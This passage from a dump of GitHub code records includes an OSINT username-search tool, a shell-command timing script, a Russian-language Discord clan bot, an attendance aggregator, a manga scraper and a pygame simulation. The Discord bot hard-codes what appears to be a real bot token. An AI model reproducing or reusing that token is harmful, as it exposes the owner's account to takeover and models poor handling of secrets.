\"com.i3visio.Alias\",\n \"value\": \"i3visio\"\n },\n {\n \"attributes\": [],\n \"type\": \"com.i3visio.Platform\",\n \"value\": \"Twitter\"\n }\n ],\n \"type\": \"com.i3visio.Profile\",\n \"value\": \"Twitter - i3visio\"\n }\n ,\n ...\n ]\n \"\"\"\n for r in res:\n # The format of the results (attributes) for a given nick is a list as follows:\n\n for att in r[\"attributes\"]:\n # iterating through the attributes\n platform = \"\"\n uri = \"\"\n for details in att[\"attributes\"]:\n if details[\"type\"] == \"com.i3visio.Platform\":\n platform = details[\"value\"]\n if details[\"type\"] == \"com.i3visio.URI\":\n uri = details[\"value\"]\n try:\n str_results += (str(platform) + \":\").ljust(16, ' ')+ \" \"+ str(uri)+\"\\n\\t\\t\"\n except:\n pass\n\n # Generating summary files for each ...\n if args.extension:\n # Verifying if the outputPath exists\n if not os.path.exists (args.output_folder):\n os.makedirs(args.output_folder)\n\n # Grabbing the results\n file_header = os.path.join(args.output_folder, args.file_header)\n\n # Iterating through the given extensions to print its values\n for ext in args.extension:\n # Generating output files\n general.export_usufy(res, ext, file_header)\n\n now = dt.datetime.now()\n print(f\"\\n{now}\\tResults obtained ({general.emphasis(len(res))}):\\n\")\n print(general.success(general.osrf_to_text_export(res)))\n\n if args.web_browser:\n general.open_results_in_browser(res)\n\n now = dt.datetime.now()\n print(\"\\n\" + str(now) + \"\\tYou can find all the information here:\")\n for ext in args.extension:\n # Showing the output files\n print(\"\\t\" + general.emphasis(file_header + \".\" + ext))\n\n # Showing the execution time...\n end_time = dt.datetime.now()\n print(f\"\\n{end_time}\\tFinishing execution...\\n\")\n print(\"Total time consumed:\\t\" + general.emphasis(str(end_time-start_time)))\n print(\"Average seconds/query:\\t\" + general.emphasis(str((end_time-start_time).total_seconds()/len(list_platforms))) +\" seconds\\n\")\n\n # Urging users to place an issue on Github...\n print(banner.footer)\n\n if params:\n return 
res\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"i3visio/osrframework","sub_path":"osrframework/usufy.py","file_name":"usufy.py","file_ext":"py","file_size_in_byte":26887,"program_lang":"python","lang":"en","doc_type":"code","stars":837,"dataset":"github-code","pt":"60"} +{"seq_id":"40604217302","text":"#Internship Assignment 2\r\n#Monument Labs\r\n\r\n#Author: Alexander Moreno\r\n#Date: 5/26/2018\r\n#Task 1\r\n\r\n#UNIX Operating Systems are assumed\r\n\r\n\r\n#imports\r\nimport subprocess\r\nimport time\r\n\r\n\r\n\r\n\r\n#display data from runCommands\r\ndef displayReport(data):\r\n print(\"\\nTime Statistics:\\n\")\r\n print(\"\\t Minimum runtime: command \\'%s\\' at %0.4f seconds.\\n\" % (data[0][0],data[0][1]) )\r\n print(\"\\t Maximum runtime: command \\'%s\\' at %0.4f seconds.\\n\" % (data[1][0],data[1][1]))\r\n print(\"\\t Average runtime: %0.4f seconds.\\n\" % data[2])\r\n print(\"\\t Total elapsed time: %0.4f seconds.\\n\" % data[3])\r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\ndef runCommands(cmds):\r\n #Variables\r\n #cmdstimes=[]\r\n minTime= None\r\n minIndex = 0\r\n maxTime=None\r\n maxIndex = 0\r\n avgTime=0\r\n totalTime=0\r\n for cmd in cmds:\r\n #set up process\r\n start = time.time()\r\n p = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)\r\n\r\n #Wait for processes to finish\r\n while p.poll() is None:\r\n time.sleep(0)\r\n end = time.time()\r\n\r\n \r\n if minTime == None and maxTime == None:\r\n minTime = end-start\r\n maxTime = end-start\r\n minIndex = cmds.index(cmd)\r\n maxIndex = cmds.index(cmd)\r\n \r\n if (end-start) > maxTime:\r\n maxTime = end-start\r\n maxIndex = cmds.index(cmd)\r\n elif (end-start) < minTime:\r\n minTime = end-start\r\n minIndex = cmds.index(cmd)\r\n\r\n #add to total elapsed time\r\n totalTime += end-start\r\n #cmdstimes.append(end-start)\r\n #print(cmdstimes)\r\n #Process data\r\n avgTime = totalTime / len(cmds)\r\n\r\n return ([cmds[minIndex],minTime],[cmds[maxIndex],maxTime],avgTime,totalTime)\r\n \r\n\r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n #commands\r\n commands = [\r\n 'sleep 3',\r\n 'ls -l /',\r\n 'find /',\r\n 'sleep 4',\r\n 'find /usr',\r\n 'date',\r\n 'sleep 5',\r\n 'uptime'\r\n ]\r\n #run commands\r\n data = runCommands(commands)\r\n #display statistics for execution\r\n displayReport(data)\r\n","repo_name":"MorenoAlexander/InternAssignmentMonumentLabs","sub_path":"task1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29100211653","text":"import asyncio\r\nimport websockets\r\nimport aiohttp\r\nimport logging\r\nimport discord\r\n\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\nclient = discord.Client()\r\nglobal mojnoli\r\nmojnoli = 1\r\n\r\n@client.event\r\nasync def on_ready():\r\n print('Logged in as')\r\n print(client.user.name)\r\n print(client.user.id)\r\n print('----------------------')\r\n print(client)\r\n client.accept_invite('https://discord.gg/byfXzHt')\r\n await client.change_status(game=discord.Game(name='Макро'))\r\n\r\n@client.event\r\nasync def on_message(message):\r\n s1 = message.content\r\n s2 = s1.split()\r\n global announce\r\n global stk\r\n\r\n global an #= open('anonc.txt', '+')\r\n\r\n def botinvoke(msg):\r\n if 'бот' in msg or 'Бот' in msg or 'бот,' in msg or 'Бот,' in msg:\r\n return True\r\n else:\r\n return False\r\n\r\n def bgrets(m2): \r\n if 'Привет' in m2 or 'привет' in m2 or 'Ку' in m2 or 'ку' in m2 or 
'Привет,' in m2 or 'Ку,' in m2 or 'ку,' in m2 or 'Хай' in m2 or 'хай' in m2 or 'хай,' in m2 or 'Хай,' in m2 or 'привет!' in m2 or 'привет,' in m2: \r\n return True\r\n \r\n def cats(m2):\r\n if 'кот' in m2 or 'Кот' in m2 or 'Кота' in m2 or 'кота' in m2 or 'Котика' in m2 or 'котика' in m2 or 'котика?' in m2 or 'кота?' in m2:\r\n return True\r\n\r\n def isboss():\r\n man = message.author.name\r\n if man == 'Naxis' or man == 'Nicred' or man == 'VaultBoy' or man == 'YamatoSC':\r\n return True\r\n else:\r\n return False\r\n \r\n\r\n def info(m2):\r\n if 'Список' in m2 or 'список' in m2 or 'таблица' in m2 or 'Таблица' in m2 or 'Игроки' in m2 or 'игроки' in m2:\r\n return True\r\n \r\n if botinvoke(s2)== True:\r\n if bgrets(s2) == True:\r\n if 'никред' in s2 or 'Никред' in s2 or 'никрид' in s2 or 'Никрид' in s2:\r\n return\r\n respto = message.author.mention\r\n neim = message.author.name\r\n if neim == 'FFA':\r\n await client.send_file(message.channel, 'peka.jpg', content=('%s бесишь' % respto))\r\n elif neim == 'VaultBoy':\r\n await client.send_message(message.channel, 'Приветствую, владыка всея хасу, успешный предприниматель, ораганизатор и просто хороший человек %s' % respto)\r\n elif neim == 'WayTeh':\r\n await client.send_message(message.channel, 'Евгений Ваганович, здрасте. Опять шутить будете?')\r\n elif neim == 'Coose':\r\n await client.send_file(message.channel, 'peka.jpg', content=('О, привет, %s. Как ты так быстро вырос из бронзы в алмаз? Ты же в школе должен быть!' % respto))\r\n elif neim == 'Naxis':\r\n await client.send_message(message.channel, '%s, ток не чизь(9' % respto)\r\n elif neim == '#hater':\r\n await client.send_file(message.channel, 'peka.jpg', content=('Привет, %s. Го голос?' % respto))\r\n elif neim == 'YamatoSC':\r\n await client.send_file(message.channel, 'peka.jpg', content=('Привет, %s. Когда ты уже вступишь в хасу ?' % respto))\r\n elif neim == 'SlyFox':\r\n await client.send_message(message.channel, 'Привет, %s. Ты уже научился строить ццшки ?:D' % respto)\r\n elif neim == 'Phoenix':\r\n await client.send_message(message.channel, 'Привет, %s. Взял ачивку за командники?' % respto)\r\n elif neim == 'AdmiralMer':\r\n await client.send_message(message.channel, 'Привет, %s. Всё ещё катаешь в мех ?' % respto)\r\n await client.send_file(message.channel, 'peka.jpg')\r\n elif neim == 'BolvaX':\r\n await client.send_message(message.channel, 'О, %s ты жив О_О' % respto)\r\n elif neim == 'azunyashka':\r\n await client.send_message(message.channel, 'Два чая господину %s из клана Houkago Tea Team' % respto)\r\n elif neim == 'Near':\r\n await client.send_message(message.channel, 'Привет, словоопасный %s' % respto)\r\n elif neim == 'Nicred':\r\n await client.send_file(message.channel, 'peka.jpg', content=('О, привет, %s. Как в школе дела ?' % respto))\r\n elif neim == 'Kronaz':\r\n await client.send_message(message.channel, 'O, %s,привет! 
Они тут без тебя совсем низуя не могут' % respto)\r\n else: \r\n await client.send_message(message.channel, 'Привет, %s' % respto) \r\n\r\n if message.content == ('таблица') or message.content ==('Таблица'):\r\n await client.send_message(message.channel, r'Таблица игроков - https://docs.google.com/spreadsheets/d/10-ZIiyvbOcJDxj3Pf9RtlBEx9aTQ7skwiUvDyTiP6-A/edit#gid=2008021498')\r\n\r\n if message.content == ('ссылки') or message.content == ('Cсылки'):\r\n await client.send_message(message.channel, r'Канал клана \"Hasu\" на YouTube - https://www.youtube.com/channel/UCmYQiYElhdzp1r-FHK83sKg')\r\n await client.send_message(message.channel, r'Канал WayTeh на YouTube https://www.youtube.com/channel/UC-xiI_-izDZL6p15fxHTSQg')\r\n await client.send_message(message.channel, r'Стримы VaultBoy - http://goodgame.ru/channel/Vault2501/ и https://www.twitch.tv/v4u1tboy ')\r\n await client.send_message(message.channel, r'Стримы SlyFox - http://goodgame.ru/channel/SlyFoxPul/ и https://www.twitch.tv/slyfoxpul')\r\n await client.send_message(message.channel, r'Стримы MasterPendal - http://goodgame.ru/channel/Pendal/')\r\n await client.send_message(message.channel, r'Стримы PesheVik - http://goodgame.ru/channel/PesheVik/ Канал YouTube - https://www.youtube.com/channel/UC5TOurQxipkJLt2a9WzyGGA')\r\n if message.content.startswith('whb'):\r\n print(isboss())\r\n if message.content.startswith('setka is'):\r\n if isboss() == True: \r\n stk = open(\"setka.txt\", 'w')\r\n stk.write(message.content[9:])\r\n stk.close()\r\n await client.send_message(message.channel, 'Ок, босс!') \r\n print(message.content[9:])\r\n else:\r\n print(message.author.name)\r\n await client.send_message(message.channel, 'Ты не босс!')\r\n if message.content.startswith('Анонс ='):\r\n if isboss() == True: \r\n anc = open(\"announce.txt\", 'w')\r\n anc.write(message.content[8:])\r\n anc.close()\r\n await client.send_message(message.channel, 'Ок, босс!') \r\n print(message.content[9:])\r\n else:\r\n print(message.author.name)\r\n await client.send_message(message.channel, 'Недостаточно минералов')\r\n \r\n if message.content.startswith('+pigc'):\r\n \r\n if isboss() == True: \r\n await client.send_message('general', message.content[6:]) \r\n print(message.content[9:])\r\n if message.content == ('dm'):\r\n deleted = client.purge_from(message.channel, limit=10)\r\n await client.send_message(message.channel, 'Deleted {} message(s)'.format(len(deleted)))\r\n print(deleted)\r\n #client.delete_messages(td)\r\n #if message.content == ('!dm %i' %hmtd)\r\n #delete_messages(messages)\r\n#=================================GET ABOVE=======================================\r\n \r\n#=================================================================================\r\n \r\n#===============================POST UNDER========================================\r\n if message.content == ('Анонс') or message.content == ('анонс'):\r\n anc = open('announce.txt', 'r')\r\n msssk2 = anc.read()\r\n await client.send_message(message.channel, msssk2) \r\n\r\n if message.content == ('сетка') or message.content == ('Сетка'): \r\n stk = open('setka.txt', 'r')\r\n msssk = stk.read()\r\n await client.send_message(message.channel, msssk)\r\n \r\n if message.content == ('Бот') or message.content == ('бот'): \r\n hlp = open('hlp.txt', 'r')\r\n msdg = hlp.read()\r\n await client.send_message(message.channel, msdg)\r\n \r\n if message.content == ('клан') or message.content == ('Клан'):\r\n await client.send_message(message.channel, r'Рейтинги игроков клана - 
http://www.rankedftw.com/clan/H%D0%B0su/played/')\r\n\r\n if ('(peka)') in message.content:\r\n await client.send_file(message.channel, 'peka.jpg')\r\n \r\n if message.content == ('тст'):\r\n print(message.author.name)\r\n if message.author.name == ('Nicred'):\r\n print('yes')\r\n if message.author == client.user:\r\n return\r\n#TODO: DELETING\r\n#\r\n\r\nclient.run('MjEwMDk4NTg5MDgxMjcyMzIw.CoJ1dw.xTAauN-GRTdvq_ccopLtxG3WGbI')\r\n\r\n\r\n \r\n","repo_name":"Nicred/Bothasu","sub_path":"pybotbotdis.py","file_name":"pybotbotdis.py","file_ext":"py","file_size_in_byte":9856,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30871017135","text":"import pandas as pd\nimport json\nimport os\n \n# Specify the JSON file name\njson_file_name = \"/var/lib/jenkins/workspace/test/insecure-bank-Reference.json\"\n \n# Extract the base name of the JSON file (without extension)\nbase_name = os.path.splitext(os.path.basename(json_file_name))[0]\n \n# Load JSON data from file\nwith open(json_file_name, 'r') as json_file:\n data = json.load(json_file)\n \n# Convert JSON to DataFrame\ndf = pd.json_normalize(data)\n \n# Save DataFrame to Excel with the same base name as JSON file\nexcel_file_name = f'{base_name}.xlsx'\ndf.to_excel(excel_file_name, index=False)\n \nprint(f\"Conversion completed. Excel file saved as: {excel_file_name}\")\n","repo_name":"sakirm-icpl/convert","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41706826712","text":"from collections import Counter\r\n\r\n# print('input >>')\r\n\r\nS = input()\r\nS = S[::-1] + '0'\r\n\r\nmod = 0\r\nmods = [0] * 2019\r\nmods[0] += 1\r\n\r\ni_mod = 1\r\n\r\nfor i in range(len(S)-1):\r\n # mods[i+1] = (int(S[i+1]) * 10 ** (i+1) + mods[i]) % 2019\r\n i_mod %= 2019\r\n mod = (int(S[i]) * i_mod + mod) % 2019\r\n # print(mod)\r\n mods[mod]+=1\r\n i_mod *= 10\r\n\r\n# print(mods)\r\n\r\nans = 0\r\n\r\n# counter = Counter(mods)\r\n\r\n# for n in counter.values():\r\n# if n > 1:\r\n# ans += (n * (n-1)) // 2\r\n\r\n# print('-----output-----')\r\n\r\nfor m in mods:\r\n if m > 1:\r\n ans += (m * (m-1)) // 2\r\n\r\nprint(ans)","repo_name":"kussy-tessy/atcoder","sub_path":"old/ABC164/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5995981882","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n# --------------------------------------\nimport pandas as pd\nimport glob\nimport sys\nimport os\nimport os.path\nfrom os import walk\nfrom os.path import isfile, join\nimport hashlib\n# --------------------------------------\n\nif (len(sys.argv) < 2):\n\tprint(\"No argument was given or too few.\\nUse: attendance.py [directory=]\")\n\tsys.exit(1)\n\ndirectory = sys.argv[1] #Takes all files in path and runs on them\nf = []\nfp = []\n\ncwd = os.getcwd() #gets current directory\ncdcwd = cwd+\"/\"+directory #go to user input directrory\nsearch = directory+\"/participant-*\"\nhash_md5 = hashlib.md5()\n\ndef getListDirFiles(searchFile):\n\tfor item in glob.glob(searchFile):\n\t\tf.append(os.path.basename(item))\n\t\tfp.append(item)\t\n\treturn f, fp\n\t\ndef createDir(dirname):\n\tdirct = os.path.join(cdcwd, dirname)\n\tif not os.path.exists(dirct):\n\t\tos.mkdir(dirct)\n\treturn dirct, dirname\n\nunique_files = dict()\ndef remDups(fileList):\n\tfor 
item in fileList:\n\t\th_file = hashlib.md5(open(item, 'rb').read()).hexdigest()\n\t\tif h_file not in unique_files:\n\t\t\tunique_files[h_file] = item\n\t\telse:\n\t\t\tos.remove(item)\n\t\t\t\nfilesList, filepList = getListDirFiles(search)\nremDups(filepList) #removes duplicates\npth, newdir = createDir(\"Attendance\") #pth is path to csv_files/Attendance\n\ndef getKey():\n df_key = pd.DataFrame()\n df_sample = pd.read_csv(cdcwd+\"/\"+filesList[0], encoding=\"UTF-16LE\", sep=\"\\t\")\n df_sample = df_sample.drop_duplicates(subset=['Attendee Email'])\n \n df_sample = df_sample.set_index('Attendee Email')\n df_key['Attendee Email'] = df_sample.index\n df_key = df_key.set_index('Attendee Email')\n \n df_key['Name'] = df_sample['Name']\n \n return df_key\n\ndf_key = getKey() #starts a new table which will also stores our key email values from the sample\ndf_key = df_key.sort_values(by=['Name'])\n\ndef pullRelData(df):\n\tdf[['Attendance Time','M']] = df['Attendance Duration'].str.split(' ', expand=True) #splits duration to int time and char min\n\n\tdf[['Date','Start Hour']] = df['Meeting Start Time'].str.split(' ',expand=True)\n\tdf[['End Date',\"End Hour\"]] = df['Meeting End Time'].str.split(' ',expand=True)\n\n\tdf[['sHour', 'sMinute', 'sSecond']] = df['Start Hour'].str.split(':',expand=True)\n\tdf[['eHour', 'eMinute', 'eSecond']] = df['End Hour'].str.split(':',expand=True)\n\tdf = df.drop(columns=[\"Meeting Start Time\",\"Meeting End Time\"])\n\n\tdf[\"sHour\"] = df[\"sHour\"].str.extract('(\\d+)', expand=False).astype(int)\n\tdf[\"sMinute\"] = df[\"sMinute\"].str.extract('(\\d+)', expand=False).astype(int)\n\tdf[\"eHour\"] = df[\"eHour\"].str.extract('(\\d+)', expand=False).astype(int)\n\tdf[\"eMinute\"] = df[\"eMinute\"].str.extract('(\\d+)', expand=False).astype(int)\n\n\tdf[\"Hour_diff\"] = df[\"eHour\"]-df[\"sHour\"]\n\tdf[\"Min_diff\"] = df[\"eMinute\"]-df[\"sMinute\"]\n\tdf[\"Session Duration\"] = df[\"Hour_diff\"]*60+df[\"Min_diff\"]\n\n\t#Email is key. 
Combines emails and sums them by time.\n\tdropList = df.columns[:]\n\tdropList = dropList.drop(['Name', 'Attendee Email', 'Attendance Time', 'Session Duration', 'Date'])\n\t\n\tdf = df.drop(columns=dropList)\n\tdf[\"Date\"] = df[\"Date\"].str.extract('(\\d+-\\d+-\\d+)', expand=False)\n\n\tdf[\"Attendance Time\"] = df[\"Attendance Time\"].astype(int)\n\tdf_grouped = df[['Attendee Email', 'Attendance Time']]\n\tdf_grouped = df_grouped.groupby('Attendee Email').sum() #groups by email and sums their attendance time\n\tdf = df.drop_duplicates(subset=['Attendee Email'])\n\tdf = df.set_index('Attendee Email')\n\n\tdf = df.sort_values(by=['Name'])\n\tdf[\"Attendance Time\"] = df_grouped[\"Attendance Time\"]\n\t\n\treturn df\n\nfor each in unique_files:\n\tdf = pd.read_csv(cwd+\"/\"+unique_files[each], encoding=\"UTF-16LE\", sep=\"\\t\")\t\n\tdf = pullRelData(df)\n\t##Attach new data to key data\n\tdateName = df[\"Date\"][0]\n\tdf_key[dateName] = df[\"Attendance Time\"]\n\nsumAllTimes = df_key.iloc[:,1:].sum(axis=1)\nmaxTimes = 4*60*(len(df_key.columns)-2)\ndf_key[\"Total Percentage\"] = sumAllTimes/maxTimes\n\n\ndf_key.to_csv(pth+\"/Attendance.csv\")\n\n","repo_name":"LiorTime/Bynet-Homework","sub_path":"Ex3/attendance.py","file_name":"attendance.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20648309824","text":"import requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\n\ndef Scrap_titles(PATH_TO_TCBSCANS, LOG):\n \"\"\"Scrap mangas titles from tcbscans.\n\n Args:\n PATH_TO_TCBSCANS (str): path to tcbscans directory (update)\n LOG (Any): the logger\n\n Returns:\n str: 'success' if passed, 'failed' if an error occured\n \"\"\"\n\n links_list = []\n manga_name_list = []\n\n url = \"https://tcbscans.com/projects\"\n\n try:\n response = requests.get(url)\n html_content = response.text\n soup = BeautifulSoup(html_content, \"html.parser\")\n select_element = soup.select_one('body > main > div.overflow-hidden > div > div.grid.grid-cols-1.md\\:grid-cols-2.gap-3')\n\n if select_element:\n mangas = select_element.find_all(\"div\", class_=\"relative h-24 w-24 sm:mb-0 mb-3\")\n if mangas == []:\n LOG.debug(f\"No manga added | {url}\")\n return \"failed\"\n for manga in mangas:\n link = 'https://tcbscans.com' + manga.find(\"a\").get(\"href\")\n manga_name = link.split(\"/\")[-1]\n links_list.append(link)\n manga_name_list.append(manga_name)\n LOG.debug(f\"{manga_name} added | {link}\")\n else:\n LOG.debug(f\"No element found | {url}\")\n return \"failed\"\n\n except Exception as e:\n LOG.debug(f\"Error | {e}\")\n return \"failed\"\n\n if manga_name_list == []:\n return \"failed\"\n\n LOG.info(f\"{len(manga_name_list)} mangas fetched.\")\n\n data_to_add = [{\"NomManga\": name, \"links\": links} for name, links in zip(manga_name_list, links_list)]\n datas = pd.DataFrame(data_to_add)\n datas.to_csv(f'{PATH_TO_TCBSCANS}/datas/mangas.csv', index=False)\n return \"success\"\n","repo_name":"CAprogs/PandaScan","sub_path":"src/update/websites/tcbscans/scrap_titles.py","file_name":"scrap_titles.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"20089074810","text":"class Node(object) :\n\tdef __init__(self, data) :\n\t\tself.data = data\n\t\tself.next = None\n\ndef printLL(head) :\n\twhile head is not None :\n\t\tprint(head.data)\n\t\thead = head.next\n\ndef printLastKth(head, K) :\n\tcurr1 = 
head\n\tcurr2 = head\n\n\tk = 0\n\twhile curr1 is not None :\n\t\tk+=1\n\t\tcurr1 = curr1.next\n\t\tif k > K :\n\t\t\tcurr2 = curr2.next\n\n\tprint(curr2.data)\n\n\nhead = Node(1)\n\ncurrent = head\nfor i in range(2, 100) :\n\tcurrent.next = Node(i)\n\tcurrent = current.next\n\nprintLastKth(head, 99)\n\n\n\n\n\n\n","repo_name":"raviy1290/py2-3","sub_path":"ds/ds-prob/linkedList/delKthLastElem.py","file_name":"delKthLastElem.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16243456189","text":"import os\nimport pygame\nimport datetime\nimport collections\nimport math\nfrom world import Plant, Bot, Signal\n\n\nclass BasePanel:\n def __init__(self, width, height, text_scale, text_color, bg_color):\n self.text_color = text_color\n self.text_scale = text_scale\n self.surface = pygame.Surface((width, height))\n # self.font = pygame.font.SysFont('calibri,dejavu sans,courier-new', 10)\n self.width, self.height = width, height\n self.writer = TextWriter('resources' + os.sep + 'nss_font_5x8.png', 5, 8, 1, 16)\n self.bg_color = bg_color\n\n def resize_surface(self, new_size):\n self.surface = pygame.Surface(new_size)\n self.width, self.height = new_size\n\n def get_size(self):\n return self.width, self.height\n\n\nclass ViewPort(BasePanel):\n def __init__(self, world, width, height, text_scale=1, text_color=(220, 220, 220), bg_color=(0, 0, 0)):\n super(ViewPort, self).__init__(width, height, text_scale, text_color, bg_color)\n self.world = world\n self.surface = pygame.Surface((width, height))\n self.camera_x = 0\n self.camera_y = 0\n self.zoom = 1\n self.draw_signals = True\n\n def zoom_in(self):\n self.zoom *= 2\n\n def zoom_out(self):\n if self.zoom >= 2:\n self.zoom //= 2\n\n def point_is_visible(self, point):\n visible_x = self.camera_x <= point[0] < (self.width / self.zoom) + self.camera_x\n visible_y = self.camera_y <= point[1] < (self.height / self.zoom) + self.camera_y\n return visible_x and visible_y\n\n def render(self):\n self.surface.fill(self.bg_color)\n self.surface.lock()\n pixels = pygame.surfarray.pixels3d(self.surface)\n # Draw a vague outline around the world if bounded\n if self.world.boundary_sizes:\n left, top = self.world_point_to_surface((0, 0))\n width, height = self.world.boundary_sizes[0] * self.zoom, self.world.boundary_sizes[1] * self.zoom\n pygame.draw.rect(self.surface, (15, 15, 15), (left, top, width+1, height+1), int(self.zoom**0.5))\n # TODO: Use HSV color space instead of RBG to simplify all of this\n if self.draw_signals:\n for signal in self.world.signals:\n if self.point_is_visible((signal.x, signal.y)):\n diameter = signal.diameter\n left = ((signal.x - (diameter/2)) - self.camera_x) * self.zoom\n top = ((signal.y - (diameter/2)) - self.camera_y) * self.zoom\n signal_color = signal.color if signal.color else (75, 75, 75)\n if signal.age > 2:\n age_ratio = min((signal.age-2)/signal.max_age, 1)\n signal_color = (math.floor(signal_color[0] - (signal_color[0] * age_ratio)),\n math.floor(signal_color[1] - (signal_color[1] * age_ratio)),\n math.floor(signal_color[2] - (signal_color[2] * age_ratio)))\n pygame.draw.ellipse(self.surface, signal_color,\n (left, top, diameter*self.zoom, diameter*self.zoom), 1)\n for plant in self.world.plants:\n if self.point_is_visible((plant.x, plant.y)):\n energy_ratio = plant.energy/plant.max_energy\n plant_energy_color = (int(40 * energy_ratio), int(240 * energy_ratio), int(40 * energy_ratio))\n age_ratio = 
plant.age/plant.max_age\n plant_age_color = (40 - int(20*age_ratio), 240 - int(200*age_ratio), 40 - int(20*age_ratio))\n self._draw_plant_or_bot(pixels, plant, plant_energy_color, plant_age_color, True)\n for bot in self.world.bots:\n if self.point_is_visible((bot.x, bot.y)):\n age_ratio = bot.age/bot.max_age\n if bot.age <= 10:\n bot_age_color = (30, 40, 250)\n else:\n bot_age_color = (220 - int(150*age_ratio), 60 - int(40*age_ratio), 220 - int(150*age_ratio))\n energy_ratio = 1000 - bot.energy\n bot_energy_color = (220, 60, 220) if bot.energy > 1000 \\\n else (220-int(energy_ratio*(200/1000)), 60-int(energy_ratio*(50/1000)), 220-int(energy_ratio*(200/1000)))\n self._draw_plant_or_bot(pixels, bot, bot_energy_color, bot_age_color, True)\n # Draw a selection outline if a bot is selected\n if self.world.selected_bot:\n self._draw_plant_or_bot(pixels, self.world.selected_bot, (255, 255, 255), (255, 255, 255), False)\n del pixels\n self.surface.unlock()\n\n def _draw_plant_or_bot(self, pixel_array, entity, entity_color, energy_color, selected_color):\n t = 0 if selected_color else 1\n diameter = self.zoom\n if not selected_color:\n diameter += 2\n if diameter == 3:\n diameter += 1\n x, y = self.world_point_to_surface((entity.x, entity.y))\n if self.zoom == 1:\n pixel_array[x][y] = entity_color\n if not selected_color:\n for border_x, border_y in ((-1, -1), (-1, 1), (1, -1), (1, 1)):\n px = x + border_x\n py = y + border_y\n pixel_array[px][py] = (255, 255, 255)\n elif self.zoom <= 2:\n pygame.draw.rect(self.surface, entity_color, (x - diameter//2, y - diameter//2, diameter, diameter), t)\n elif 3 <= self.zoom < 8:\n pygame.draw.ellipse(self.surface, entity_color, (x - diameter//2, y - diameter//2, diameter, diameter), t)\n else:\n pygame.draw.ellipse(self.surface, entity_color, (x - diameter//2, y - diameter//2, diameter, diameter), t)\n pygame.draw.ellipse(self.surface, energy_color,\n (x - diameter//4, y - diameter//4, diameter//2, diameter//2), 0)\n\n def track_selected_bot(self):\n if self.world.selected_bot:\n bot = self.world.selected_bot\n self.center_camera_on_point((bot.x, bot.y))\n\n def move_camera_to_coordinates(self, x, y):\n self.camera_x, self.camera_y = x, y\n\n def move_camera_by_vector(self, dx, dy):\n self.camera_x += dx\n self.camera_y += dy\n\n def get_center_offset(self):\n dx = (self.width / (self.zoom + 1)) - self.camera_x\n dy = (self.height / (self.zoom + 1)) - self.camera_y\n return dx, dy\n\n def center_camera_on_point(self, point):\n box_width, box_height = self.width/self.zoom, self.height/self.zoom\n half_width, half_height = box_width/2, box_height/2\n x = point[0] - half_width\n y = point[1] - half_height\n self.move_camera_to_coordinates(x, y)\n\n def surface_point_to_world(self, point):\n return (point[0] / self.zoom) + self.camera_x, (point[1] / self.zoom) + self.camera_y\n\n def world_point_to_surface(self, point):\n return (point[0]-self.camera_x) * self.zoom, (point[1]-self.camera_y) * self.zoom\n\n\nclass InfoPanel(BasePanel):\n def __init__(self, world, clock, width, height, text_scale, text_color, bg_color):\n super(InfoPanel, self).__init__(width, height, text_scale, text_color, bg_color)\n self.world = world\n self.clock = clock\n self.labels_map = self._position_labels()\n self._position_labels()\n\n def _position_labels(self):\n x = 5\n y = 22 * self.text_scale\n labels = [\"Tick\", \"Time\", \"FPS\", \"Free Energy\", \"Plants\", \"Bots\", \"Signals\", \"Plants Born\", \"Bots Born\",\n \"Signals Used\"]\n positions = []\n for index, label in 
enumerate(labels):\n positions.append((label, (x, (index+1)*y)))\n positions.insert(0, (\"Metrics\", (x, x)))\n return positions\n\n def render(self):\n # TODO: Make this cleaner\n data = self._poll_data()\n self.surface.fill(self.bg_color)\n for index, pair in enumerate(self.labels_map):\n label, pos = pair\n label_surface = self.writer.get_text_surface(label, self.text_color)\n if self.text_scale > 1:\n new_width = label_surface.get_width() * self.text_scale\n new_height = label_surface.get_height() * self.text_scale\n label_surface = pygame.transform.scale(label_surface, (new_width, new_height))\n # label_surface = self.font.render(label, 0, color)\n self.surface.blit(label_surface, pos)\n if index > 0:\n amount_surface = self.writer.get_text_surface(str(data[index-1]), self.text_color)\n if self.text_scale > 1:\n new_width = amount_surface.get_width() * self.text_scale\n new_height = amount_surface.get_height() * self.text_scale\n amount_surface = pygame.transform.scale(amount_surface, (new_width, new_height))\n # amount_surface = self.font.render(str(data[index-1]), 0, color)\n self.surface.blit(amount_surface, (11, pos[1]+(11*self.text_scale)))\n\n def _poll_data(self):\n data = []\n data.append(self.world.tick_number)\n seconds = int(self.world.time)\n data.append(str(datetime.timedelta(seconds=seconds)))\n data.append(round(self.clock.get_fps(), 2))\n if self.world.energy_pool is not None:\n data.append(self.world.energy_pool)\n else:\n data.append(\"Unlimited\")\n data.append(len(self.world.plants))\n data.append(len(self.world.bots))\n data.append(len(self.world.signals))\n data.append(Plant.counter)\n data.append(Bot.counter)\n data.append(Signal.counter)\n return data\n\n\nclass BotPanel(BasePanel):\n def __init__(self, world, width, height, text_scale, text_color, bg_color):\n super(BotPanel, self).__init__(width, height, text_scale, text_color, bg_color)\n self.world = world\n self.labels_map = self._position_labels()\n\n def _position_labels(self):\n x = 7\n y = 22 * self.text_scale\n labels = 